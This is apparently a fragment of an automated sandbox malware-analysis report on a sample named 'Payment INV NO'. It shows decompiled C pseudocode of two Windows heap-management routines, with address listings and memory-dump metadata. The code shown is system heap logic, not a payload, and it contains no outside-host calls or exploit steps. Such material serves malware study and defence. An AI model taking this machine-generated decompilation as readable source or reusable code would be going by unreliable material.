				signed short* _v52;
				void* __ebx;
				void* __edi;
				void* __ebp;
				signed int _t131;
				signed char _t134;
				signed int _t138;
				char _t141;
				signed short _t142;
				void* _t146;
				signed short _t147;
				intOrPtr* _t149;
				intOrPtr _t156;
				signed int _t167;
				signed int _t168;
				signed short* _t173;
				signed short _t174;
				intOrPtr* _t182;
				signed short _t184;
				intOrPtr* _t187;
				intOrPtr _t197;
				intOrPtr _t206;
				intOrPtr _t210;
				signed short _t211;
				intOrPtr* _t212;
				signed short _t214;
				signed int _t216;
				intOrPtr _t217;
				signed char _t225;
				signed short _t235;
				signed int _t237;
				intOrPtr* _t238;
				signed int _t242;
				unsigned int _t245;
				signed int _t251;
				intOrPtr* _t252;
				signed int _t253;
				intOrPtr* _t255;
				signed int _t256;
				void* _t257;
				void* _t260;

				_t256 = __edx;
				_t206 = __ecx;
				_t235 = _a4;
				_v44 = __ecx;
				_v24 = _t235;
				if(_t235 == 0) {
					L41:
					return _t131;
				}
				_t251 = ( *(__edx + 4) ^  *(__ecx + 0x54)) & 0x0000ffff;
				if(_t251 == 0) {
					__eflags =  *0x1888748 - 1;
					if( *0x1888748 >= 1) {
						__eflags =  *(__edx + 2) & 0x00000008;
						if(( *(__edx + 2) & 0x00000008) == 0) {
							__eflags = (__edx + 0x00000fff & 0xfffff000) - __edx;
							if((__edx + 0x00000fff & 0xfffff000) != __edx) {
								_t197 =  *[fs:0x30];
								__eflags =  *(_t197 + 0xc);
								if( *(_t197 + 0xc) == 0) {
									_push("HEAP: ");
									E0179B150();
									_t260 = _t257 + 4;
								} else {
									E0179B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
									_t260 = _t257 + 8;
								}
								_push(0x178d3b0);
								E0179B150();
								_t257 = _t260 + 4;
								__eflags =  *0x1887bc8;
								if(__eflags == 0) {
									L01852073(_t206, 1, _t251, __eflags);
								}
								_t235 = _v24;
							}
						}
					}
				}
				_t134 =  *((intOrPtr*)(_t256 + 6));
				if(_t134 == 0) {
					_t210 = _t206;
					_v48 = _t206;
				} else {
					_t210 = (_t256 & 0xffff0000) - ((_t134 & 0x000000ff) << 0x10) + 0x10000;
					_v48 = _t210;
				}
				_v5 =  *(_t256 + 2);
				do {
					if(_t235 > 0xfe00) {
						_v12 = 0xfe00;
						__eflags = _t235 - 0xfe01;
						if(_t235 == 0xfe01) {
							_v12 = 0xfdf0;
						}
						_t138 = 0;
					} else {
						_v12 = _t235 & 0x0000ffff;
						_t138 = _v5;
					}
					 *(_t256 + 2) = _t138;
					 *(_t256 + 4) =  *(_t206 + 0x54) ^ _t251;
					_t236 =  *((intOrPtr*)(_t210 + 0x18));
					if( *((intOrPtr*)(_t210 + 0x18)) == _t210) {
						_t141 = 0;
					} else {
						_t141 = (_t256 - _t210 >> 0x10) + 1;
						_v40 = _t141;
						if(_t141 >= 0xfe) {
							_push(_t210);
							L0185A80D(_t236, _t256, _t210, 0);
							_t141 = _v40;
						}
					}
					 *(_t256 + 2) =  *(_t256 + 2) & 0x000000f0;
					 *((char*)(_t256 + 6)) = _t141;
					_t142 = _v12;
					 *_t256 = _t142;
					 *(_t256 + 3) = 0;
					_t211 = _t142 & 0x0000ffff;
					 *((char*)(_t256 + 7)) = 0;
					_v20 = _t211;
					if(( *(_t206 + 0x40) & 0x00000040) != 0) {
						E017ED5E0(_t256 + 0x10, _t211 * 8 - 0x10, 0xfeeefeee);
						 *(_t256 + 2) =  *(_t256 + 2) | 0x00000004;
						_t211 = _v20;
					}
					_t252 =  *((intOrPtr*)(_t206 + 0xb4));
					if(_t252 == 0) {
						L56:
						_t212 =  *((intOrPtr*)(_t206 + 0xc0));
						_t146 = _t206 + 0xc0;
						goto L19;
					} else {
						if(_t211 <  *((intOrPtr*)(_t252 + 4))) {
							L15:
							_t185 = _t211;
							goto L17;
						} else {
							while(1) {
								_t187 =  *_t252;
								if(_t187 == 0) {
									_t185 =  *((intOrPtr*)(_t252 + 4)) - 1;
									__eflags =  *((intOrPtr*)(_t252 + 4)) - 1;
									goto L17;
								}
								_t252 = _t187;
								if(_t211 >=  *((intOrPtr*)(_t252 + 4))) {
									continue;
								}
								goto L15;
							}
							while(1) {
								L17:
								_t212 = E017BAB40(_t206, _t252, 1, _t185, _t211);
								if(_t212 != 0) {
									_t146 = _t206 + 0xc0;
									break;
								}
								_t252 =  *_t252;
								_t211 = _v20;
								_t185 =  *(_t252 + 0x14);
							}
							L19:
							if(_t146 != _t212) {
								_t237 =  *(_t206 + 0x4c);
								_t253 = _v20;
								while(1) {
									__eflags = _t237;
									if(_t237 == 0) {
										_t147 =  *(_t212 - 8) & 0x0000ffff;
									} else {
										_t184 =  *(_t212 - 8);
										_t237 =  *(_t206 + 0x4c);
										__eflags = _t184 & _t237;
										if((_t184 & _t237) != 0) {
											_t184 = _t184 ^  *(_t206 + 0x50);
											__eflags = _t184;
										}
										_t147 = _t184 & 0x0000ffff;
									}
									__eflags = _t253 - (_t147 & 0x0000ffff);
									if(_t253 <= (_t147 & 0x0000ffff)) {
										goto L20;
									}
									_t212 =  *_t212;
									__eflags = _t206 + 0xc0 - _t212;
									if(_t206 + 0xc0 != _t212) {
										continue;
									} else {
										goto L20;
									}
									goto L56;
								}
							}
							L20:
							_t149 =  *((intOrPtr*)(_t212 + 4));
							_t238 = _t256 + 8;
							_t254 =  *_t149;
							if( *_t149 != _t212) {
								_push(_t212);
								L0185A80D(0, _t212, 0, _t254);
							} else {
								 *_t238 = _t212;
								 *((intOrPtr*)(_t238 + 4)) = _t149;
								 *_t149 = _t238;
								 *((intOrPtr*)(_t212 + 4)) = _t238;
							}
							 *((intOrPtr*)(_t206 + 0x74)) =  *((intOrPtr*)(_t206 + 0x74)) + ( *_t256 & 0x0000ffff);
							_t255 =  *((intOrPtr*)(_t206 + 0xb4));
							if(_t255 == 0) {
								L36:
								if( *(_t206 + 0x4c) != 0) {
									 *(_t256 + 3) =  *(_t256 + 1) ^  *(_t256 + 2) ^  *_t256;
									 *_t256 =  *_t256 ^  *(_t206 + 0x50);
								}
								_t210 = _v48;
								_t251 = _v12 & 0x0000ffff;
								_t131 = _v20;
								_t235 = _v24 - _t131;
								_v24 = _t235;
								_t256 = _t256 + _t131 * 8;
								if(_t256 >=  *((intOrPtr*)(_t210 + 0x28))) {
									goto L41;
								} else {
									goto L39;
								}
							} else {
								_t216 =  *_t256 & 0x0000ffff;
								_v28 = _t216;
								if(_t216 <  *((intOrPtr*)(_t255 + 4))) {
									L28:
									_t242 = _t216 -  *((intOrPtr*)(_t255 + 0x14));
									_v32 = _t242;
									if( *((intOrPtr*)(_t255 + 8)) != 0) {
										_t167 = _t242 + _t242;
									} else {
										_t167 = _t242;
									}
									 *((intOrPtr*)(_t255 + 0xc)) =  *((intOrPtr*)(_t255 + 0xc)) + 1;
									_t168 = _t167 << 2;
									_v40 = _t168;
									_t206 = _v44;
									_v16 =  *((intOrPtr*)(_t168 +  *((intOrPtr*)(_t255 + 0x20))));
									if(_t216 ==  *((intOrPtr*)(_t255 + 4)) - 1) {
										 *((intOrPtr*)(_t255 + 0x10)) =  *((intOrPtr*)(_t255 + 0x10)) + 1;
									}
									_t217 = _v16;
									if(_t217 != 0) {
										_t83 = _t217 - 8; // -8
										_t173 = _t83;
										_v52 = _t173;
										_t174 =  *_t173;
										__eflags =  *(_t206 + 0x4c);
										if( *(_t206 + 0x4c) != 0) {
											_t245 =  *(_t206 + 0x50) ^ _t174;
											_v36 = _t245;
											_t225 = _t245 >> 0x00000010 ^ _t245 >> 0x00000008 ^ _t245;
											__eflags = _t245 >> 0x18 - _t225;
											if(_t245 >> 0x18 != _t225) {
												_push(_t225);
												L0185A80D(_t206, _v52, 0, 0);
											}
											_t174 = _v36;
											_t217 = _v16;
											_t242 = _v32;
										}
										_v28 = _v28 - (_t174 & 0x0000ffff);
										__eflags = _v28;
										if(_v28 > 0) {
											goto L34;
										} else {
											goto L33;
										}
									} else {
										L33:
										 *((intOrPtr*)(_v40 +  *((intOrPtr*)(_t255 + 0x20)))) = _t256 + 8;
										_t206 = _v44;
										_t217 = _v16;
										L34:
										if(_t217 == 0) {
											asm("bts eax, edx");
										}
										goto L36;
									}
								} else {
									goto L24;
								}
								while(1) {
									L24:
									_t182 =  *_t255;
									if(_t182 == 0) {
										_t216 =  *((intOrPtr*)(_t255 + 4)) - 1;
										__eflags = _t216;
										goto L28;
									}
									_t255 = _t182;
									if(_t216 >=  *((intOrPtr*)(_t255 + 4))) {
										continue;
									} else {
										goto L28;
									}
								}
								goto L28;
							}
						}
					}
					L39:
				} while (_t235 != 0);
				_t214 = _v12;
				_t131 =  *(_t206 + 0x54) ^ _t214;
				 *(_t256 + 4) = _t131;
				if(_t214 == 0) {
					__eflags =  *0x1888748 - 1;
					if( *0x1888748 >= 1) {
						_t127 = _t256 + 0xfff; // 0xfff
						_t131 = _t127 & 0xfffff000;
						__eflags = _t131 - _t256;
						if(_t131 != _t256) {
							_t156 =  *[fs:0x30];
							__eflags =  *(_t156 + 0xc);
							if( *(_t156 + 0xc) == 0) {
								_push("HEAP: ");
								E0179B150();
							} else {
								E0179B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
							}
							_push(0x178d428);
							_t131 = E0179B150();
							__eflags =  *0x1887bc8;
							if(__eflags == 0) {
								_t131 = L01852073(_t206, 1, _t251, __eflags);
							}
						}
					}
				}
				goto L41;
			}























































                                                          0x017ba83a
                                                          0x017ba83c
                                                          0x017ba83e
                                                          0x017ba841
                                                          0x017ba844
                                                          0x017ba84a
                                                          0x017baa53
                                                          0x017baa59
                                                          0x017baa59
                                                          0x017ba858
                                                          0x017ba85e
                                                          0x017baaf5
                                                          0x017baafc
                                                          0x0180229e
                                                          0x018022a2
                                                          0x018022b3
                                                          0x018022b5
                                                          0x018022bb
                                                          0x018022c1
                                                          0x018022c5
                                                          0x018022e6
                                                          0x018022eb
                                                          0x018022f0
                                                          0x018022c7
                                                          0x018022dc
                                                          0x018022e1
                                                          0x018022e1
                                                          0x018022f3
                                                          0x018022f8
                                                          0x018022fd
                                                          0x01802300
                                                          0x01802307
                                                          0x0180230e
                                                          0x0180230e
                                                          0x01802313
                                                          0x01802313
                                                          0x018022b5
                                                          0x018022a2
                                                          0x017baafc
                                                          0x017ba864
                                                          0x017ba869
                                                          0x017baa5c
                                                          0x017baa5e
                                                          0x017ba86f
                                                          0x017ba87f
                                                          0x017ba885
                                                          0x017ba885
                                                          0x017ba88b
                                                          0x017ba890
                                                          0x017ba896
                                                          0x017bab0c
                                                          0x017bab0f
                                                          0x017bab15
                                                          0x01802320
                                                          0x01802320
                                                          0x017bab1b
                                                          0x017ba89c
                                                          0x017ba89f
                                                          0x017ba8a2
                                                          0x017ba8a2
                                                          0x017ba8a5
                                                          0x017ba8af
                                                          0x017ba8b3
                                                          0x017ba8b8
                                                          0x017baa66
                                                          0x017ba8be
                                                          0x017ba8c5
                                                          0x017ba8c6
                                                          0x017ba8ce
                                                          0x01802328
                                                          0x01802332
                                                          0x01802337
                                                          0x01802337
                                                          0x017ba8ce
                                                          0x017ba8d4
                                                          0x017ba8d8
                                                          0x017ba8db
                                                          0x017ba8de
                                                          0x017ba8e1
                                                          0x017ba8e5
                                                          0x017ba8e8
                                                          0x017ba8f0
                                                          0x017ba8f3
                                                          0x01802350
                                                          0x01802355
                                                          0x01802359
                                                          0x01802359
                                                          0x017ba8f9
                                                          0x017ba901
                                                          0x017baae4
                                                          0x017baae4
                                                          0x017baaea
                                                          0x00000000
                                                          0x017ba907
                                                          0x017ba90a
                                                          0x017ba91d
                                                          0x017ba91d
                                                          0x00000000
                                                          0x017ba910
                                                          0x017ba910
                                                          0x017ba910
                                                          0x017ba914
                                                          0x017ba924
                                                          0x017ba924
                                                          0x017ba924
                                                          0x017ba924
                                                          0x017ba916
                                                          0x017ba91b
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x017ba91b
                                                          0x017ba925
                                                          0x017ba925
                                                          0x017ba932
                                                          0x017ba936
                                                          0x017ba93c
                                                          0x017ba93c
                                                          0x017ba93c
                                                          0x017bab22
                                                          0x017bab24
                                                          0x017bab27
                                                          0x017bab27
                                                          0x017ba942
                                                          0x017ba944
                                                          0x017baaba
                                                          0x017baabd
                                                          0x017baac0
                                                          0x017baac0
                                                          0x017baac2
                                                          0x017bab2f
                                                          0x017baac4
                                                          0x017baac4
                                                          0x017baac7
                                                          0x017baaca
                                                          0x017baacc
                                                          0x017baace
                                                          0x017baace
                                                          0x017baace
                                                          0x017baad1
                                                          0x017baad1
                                                          0x017baad7
                                                          0x017baad9
                                                          0x00000000
                                                          0x00000000
                                                          0x01802361
                                                          0x01802369
                                                          0x0180236b
                                                          0x00000000
                                                          0x01802371
                                                          0x00000000
                                                          0x01802371
                                                          0x00000000
                                                          0x0180236b
                                                          0x017baac0
                                                          0x017ba94a
                                                          0x017ba94a
                                                          0x017ba94d
                                                          0x017ba950
                                                          0x017ba954
                                                          0x01802376
                                                          0x01802380
                                                          0x017ba95a
                                                          0x017ba95a
                                                          0x017ba95c
                                                          0x017ba95f
                                                          0x017ba961
                                                          0x017ba961
                                                          0x017ba967
                                                          0x017ba96a
                                                          0x017ba972
                                                          0x017baa02
                                                          0x017baa06
                                                          0x017baa10
                                                          0x017baa16
                                                          0x017baa16
                                                          0x017baa1b
                                                          0x017baa21
                                                          0x017baa24
                                                          0x017baa27
                                                          0x017baa29
                                                          0x017baa2c
                                                          0x017baa32
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x017ba978
                                                          0x017ba978
                                                          0x017ba97b
                                                          0x017ba981
                                                          0x017ba996
                                                          0x017ba998
                                                          0x017ba99f
                                                          0x017ba9a2
                                                          0x0180238a
                                                          0x017ba9a8
                                                          0x017ba9a8
                                                          0x017ba9a8
                                                          0x017ba9aa
                                                          0x017ba9ad
                                                          0x017ba9b0
                                                          0x017ba9bb
                                                          0x017ba9be
                                                          0x017ba9c7
                                                          0x017ba9c9
                                                          0x017ba9c9
                                                          0x017ba9cc
                                                          0x017ba9d1
                                                          0x017baa6d
                                                          0x017baa6d
                                                          0x017baa70
                                                          0x017baa73
                                                          0x017baa75
                                                          0x017baa79
                                                          0x017baa7e
                                                          0x017baa82
                                                          0x017baa8f
                                                          0x017baa94
                                                          0x017baa96
                                                          0x01802392
                                                          0x018023a1
                                                          0x018023a1
                                                          0x017baa9c
                                                          0x017baa9f
                                                          0x017baaa2
                                                          0x017baaa2
                                                          0x017baaa8
                                                          0x017baaab
                                                          0x017baaaf
                                                          0x00000000
                                                          0x017baab5
                                                          0x00000000
                                                          0x017baab5
                                                          0x017ba9d7
                                                          0x017ba9d7
                                                          0x017ba9e0
                                                          0x017ba9e3
                                                          0x017ba9e6
                                                          0x017ba9e9
                                                          0x017ba9eb
                                                          0x017ba9fd
                                                          0x017ba9fd
                                                          0x00000000
                                                          0x017ba9eb
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x017ba983
                                                          0x017ba983
                                                          0x017ba983
                                                          0x017ba987
                                                          0x017ba995
                                                          0x017ba995
                                                          0x017ba995
                                                          0x017ba995
                                                          0x017ba989
                                                          0x017ba98e
                                                          0x00000000
                                                          0x017ba990
                                                          0x00000000
                                                          0x017ba990
                                                          0x017ba98e
                                                          0x00000000
                                                          0x017ba983
                                                          0x017ba972
                                                          0x017ba90a
                                                          0x017baa34
                                                          0x017baa34
                                                          0x017baa40
                                                          0x017baa43
                                                          0x017baa46
                                                          0x017baa4d
                                                          0x018023ab
                                                          0x018023b2
                                                          0x018023b8
                                                          0x018023be
                                                          0x018023c3
                                                          0x018023c5
                                                          0x018023cb
                                                          0x018023d1
                                                          0x018023d5
                                                          0x018023f6
                                                          0x018023fb
                                                          0x018023d7
                                                          0x018023ec
                                                          0x018023f1
                                                          0x01802403
                                                          0x01802408
                                                          0x01802410
                                                          0x01802417
                                                          0x01802422
                                                          0x01802422
                                                          0x01802417
                                                          0x018023c5
                                                          0x018023b2
                                                          0x00000000

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.397327177.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                          • Associated: 00000004.00000002.397327177.0000000001770000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001776000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000017EC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001809000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001841000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000184B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001885000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000188B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018D8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_1770000_Payment INV NO.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: HEAP: $HEAP[%wZ]:
                                                          • API String ID: 0-3616360210
                                                          • Opcode ID: 290036f929df2fa1f58d370f391fa1216f6d2de179fed53a9865a8267372019e
                                                          • Instruction ID: 3f4bd9f449945a4e7aa43dfd15154b5b72dab320facb73c19bb765f191a38f60
                                                          • Opcode Fuzzy Hash: 290036f929df2fa1f58d370f391fa1216f6d2de179fed53a9865a8267372019e
                                                          • Instruction Fuzzy Hash: 46D1CF746002059FDB29EF68C4D4BAAF7F2FF48300F158569D95ADB746E330AA45CB60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 017BB73D Relevance: 2.7, Strings: 2, Instructions: 190COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 73%
                                                          			E017BB73D(void* __ecx, signed int __edx, intOrPtr* _a4, unsigned int _a8, intOrPtr _a12, signed int* _a16) {
				signed int _v8;
				char _v12;
				void* __ebx;
				void* __edi;
				void* __ebp;
				void* _t72;
				char _t76;
				signed char _t77;
				intOrPtr* _t80;
				unsigned int _t85;
				signed int* _t86;
				signed int _t88;
				signed char _t89;
				intOrPtr _t90;
				intOrPtr _t101;
				intOrPtr* _t111;
				void* _t117;
				intOrPtr* _t118;
				signed int _t120;
				signed char _t121;
				intOrPtr* _t123;
				signed int _t126;
				intOrPtr _t136;
				signed int _t139;
				void* _t140;
				signed int _t141;
				void* _t147;

				_t111 = _a4;
				_t140 = __ecx;
				_v8 = __edx;
				 *((intOrPtr*)(_t111 + 0x10)) = _t111 + 0x18;
				_t141 = _t111 - 8;
				 *(_t111 + 0x14) = _a8;
				_t72 = 4;
				 *(_t141 + 2) = 1;
				 *_t141 = _t72;
				 *((char*)(_t141 + 7)) = 3;
				_t134 =  *((intOrPtr*)(__edx + 0x18));
				if( *((intOrPtr*)(__edx + 0x18)) != __edx) {
					_t76 = (_t141 - __edx >> 0x10) + 1;
					_v12 = _t76;
					__eflags = _t76 - 0xfe;
					if(_t76 >= 0xfe) {
						_push(__edx);
						_push(0);
						L0185A80D(_t134, 3, _t141, __edx);
						_t76 = _v12;
					}
				} else {
					_t76 = 0;
				}
				 *((char*)(_t141 + 6)) = _t76;
				if( *0x1888748 >= 1) {
					__eflags = _a12 - _t141;
					if(_a12 <= _t141) {
						goto L4;
					}
					_t101 =  *[fs:0x30];
					__eflags =  *(_t101 + 0xc);
					if( *(_t101 + 0xc) == 0) {
						_push("HEAP: ");
						E0179B150();
					} else {
						E0179B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push(0x178d30c);
					E0179B150();
					__eflags =  *0x1887bc8;
					if(__eflags == 0) {
						L01852073(_t111, 1, _t140, __eflags);
					}
					goto L3;
				} else {
					L3:
					_t147 = _a12 - _t141;
					L4:
					if(_t147 != 0) {
						 *((short*)(_t141 + 4)) =  *((intOrPtr*)(_t140 + 0x54));
					}
					if( *((intOrPtr*)(_t140 + 0x4c)) != 0) {
						 *(_t141 + 3) =  *(_t141 + 1) ^  *(_t141 + 2) ^  *_t141;
						 *_t141 =  *_t141 ^  *(_t140 + 0x50);
					}
					_t135 =  *(_t111 + 0x14);
					if( *(_t111 + 0x14) == 0) {
						L12:
						_t77 =  *((intOrPtr*)(_t141 + 6));
						if(_t77 != 0) {
							_t117 = (_t141 & 0xffff0000) - ((_t77 & 0x000000ff) << 0x10) + 0x10000;
						} else {
							_t117 = _t140;
						}
						_t118 = _t117 + 0x38;
						_t80 = _t111 + 8;
						_t136 =  *_t118;
						if( *((intOrPtr*)(_t136 + 4)) != _t118) {
							_push(_t118);
							_push(0);
							L0185A80D(0, 0xd, _t118,  *((intOrPtr*)(_t136 + 4)));
						} else {
							 *_t80 = _t136;
							 *((intOrPtr*)(_t80 + 4)) = _t118;
							 *((intOrPtr*)(_t136 + 4)) = _t80;
							 *_t118 = _t80;
						}
						_t120 = _v8;
						 *((intOrPtr*)(_t120 + 0x30)) =  *((intOrPtr*)(_t120 + 0x30)) + 1;
						 *((intOrPtr*)(_t120 + 0x2c)) =  *((intOrPtr*)(_t120 + 0x2c)) + ( *(_t111 + 0x14) >> 0xc);
						 *((intOrPtr*)(_t140 + 0x1e8)) =  *((intOrPtr*)(_t140 + 0x1e8)) -  *(_t111 + 0x14);
						 *((intOrPtr*)(_t140 + 0x1f8)) =  *((intOrPtr*)(_t140 + 0x1f8)) + 1;
						if( *((intOrPtr*)(_t140 + 0x1f8)) > 0xa) {
							__eflags =  *(_t140 + 0xb8);
							if( *(_t140 + 0xb8) == 0) {
								_t88 =  *(_t140 + 0x40) & 0x00000003;
								__eflags = _t88 - 2;
								_t121 = _t120 & 0xffffff00 | _t88 == 0x00000002;
								__eflags =  *0x1888720 & 0x00000001;
								_t89 = _t88 & 0xffffff00 | ( *0x1888720 & 0x00000001) == 0x00000000;
								__eflags = _t89 & _t121;
								if((_t89 & _t121) != 0) {
									 *(_t140 + 0x48) =  *(_t140 + 0x48) | 0x10000000;
								}
							}
						}
						_t85 =  *(_t111 + 0x14);
						if(_t85 >= 0x7f000) {
							 *((intOrPtr*)(_t140 + 0x1ec)) =  *((intOrPtr*)(_t140 + 0x1ec)) + _t85;
						}
						_t86 = _a16;
						 *_t86 = _t141 - _a12 >> 3;
						return _t86;
					} else {
						_t90 = E017BB8E4(_t135);
						_t123 =  *((intOrPtr*)(_t90 + 4));
						if( *_t123 != _t90) {
							_push(_t123);
							_push( *_t123);
							L0185A80D(0, 0xd, _t90, 0);
						} else {
							 *_t111 = _t90;
							 *((intOrPtr*)(_t111 + 4)) = _t123;
							 *_t123 = _t111;
							 *((intOrPtr*)(_t90 + 4)) = _t111;
						}
						_t139 =  *(_t140 + 0xb8);
						if(_t139 != 0) {
							_t93 =  *(_t111 + 0x14) >> 0xc;
							__eflags = _t93;
							while(1) {
								__eflags = _t93 -  *((intOrPtr*)(_t139 + 4));
								if(_t93 <  *((intOrPtr*)(_t139 + 4))) {
									break;
								}
								_t126 =  *_t139;
								__eflags = _t126;
								if(_t126 != 0) {
									_t139 = _t126;
									continue;
								}
								_t93 =  *((intOrPtr*)(_t139 + 4)) - 1;
								__eflags =  *((intOrPtr*)(_t139 + 4)) - 1;
								break;
							}
							E017BE4A0(_t140, _t139, 0, _t111, _t93,  *(_t111 + 0x14));
						}
						goto L12;
					}
				}
			}






























                                                          0x017bb746
                                                          0x017bb74b
                                                          0x017bb74d
                                                          0x017bb755
                                                          0x017bb758
                                                          0x017bb75e
                                                          0x017bb763
                                                          0x017bb764
                                                          0x017bb76a
                                                          0x017bb76d
                                                          0x017bb771
                                                          0x017bb776
                                                          0x017bb85c
                                                          0x017bb85d
                                                          0x017bb860
                                                          0x017bb865
                                                          0x01802ba1
                                                          0x01802ba2
                                                          0x01802ba9
                                                          0x01802bae
                                                          0x01802bae
                                                          0x017bb77c
                                                          0x017bb77c
                                                          0x017bb77c
                                                          0x017bb785
                                                          0x017bb788
                                                          0x01802bb6
                                                          0x01802bb9
                                                          0x00000000
                                                          0x00000000
                                                          0x01802bbf
                                                          0x01802bc5
                                                          0x01802bc9
                                                          0x01802be8
                                                          0x01802bed
                                                          0x01802bcb
                                                          0x01802be0
                                                          0x01802be5
                                                          0x01802bf3
                                                          0x01802bf8
                                                          0x01802bfd
                                                          0x01802c05
                                                          0x01802c0e
                                                          0x01802c0e
                                                          0x00000000
                                                          0x017bb78e
                                                          0x017bb78e
                                                          0x017bb78e
                                                          0x017bb791
                                                          0x017bb791
                                                          0x017bb797
                                                          0x017bb797
                                                          0x017bb79f
                                                          0x017bb7a9
                                                          0x017bb7af
                                                          0x017bb7af
                                                          0x017bb7b1
                                                          0x017bb7b6
                                                          0x017bb7e2
                                                          0x017bb7e2
                                                          0x017bb7e7
                                                          0x017bb880
                                                          0x017bb7ed
                                                          0x017bb7ed
                                                          0x017bb7ed
                                                          0x017bb7ef
                                                          0x017bb7f2
                                                          0x017bb7f5
                                                          0x017bb7fa
                                                          0x01802c2d
                                                          0x01802c2e
                                                          0x01802c39
                                                          0x017bb800
                                                          0x017bb800
                                                          0x017bb802
                                                          0x017bb805
                                                          0x017bb808
                                                          0x017bb808
                                                          0x017bb80a
                                                          0x017bb80d
                                                          0x017bb816
                                                          0x017bb81c
                                                          0x017bb822
                                                          0x017bb82f
                                                          0x017bb88b
                                                          0x017bb892
                                                          0x017bb897
                                                          0x017bb899
                                                          0x017bb89b
                                                          0x017bb89e
                                                          0x017bb8a5
                                                          0x017bb8a8
                                                          0x017bb8aa
                                                          0x017bb8ac
                                                          0x017bb8ac
                                                          0x017bb8aa
                                                          0x017bb892
                                                          0x017bb831
                                                          0x017bb839
                                                          0x017bb83b
                                                          0x017bb83b
                                                          0x017bb844
                                                          0x017bb84b
                                                          0x017bb852
                                                          0x017bb7b8
                                                          0x017bb7ba
                                                          0x017bb7bf
                                                          0x017bb7c4
                                                          0x01802c18
                                                          0x01802c19
                                                          0x01802c23
                                                          0x017bb7ca
                                                          0x017bb7ca
                                                          0x017bb7cc
                                                          0x017bb7cf
                                                          0x017bb7d1
                                                          0x017bb7d1
                                                          0x017bb7d4
                                                          0x017bb7dc
                                                          0x017bb8bb
                                                          0x017bb8bb
                                                          0x017bb8be
                                                          0x017bb8be
                                                          0x017bb8c1
                                                          0x00000000
                                                          0x00000000
                                                          0x017bb8c3
                                                          0x017bb8c5
                                                          0x017bb8c7
                                                          0x017bb8e0
                                                          0x00000000
                                                          0x017bb8e0
                                                          0x017bb8cc
                                                          0x017bb8cc
                                                          0x00000000
                                                          0x017bb8cc
                                                          0x017bb8d6
                                                          0x017bb8d6
                                                          0x00000000
                                                          0x017bb7dc
                                                          0x017bb7b6

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.397327177.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                          • Associated: 00000004.00000002.397327177.0000000001770000.00000040.00001000.00020000.00000000.sdmpDownload File
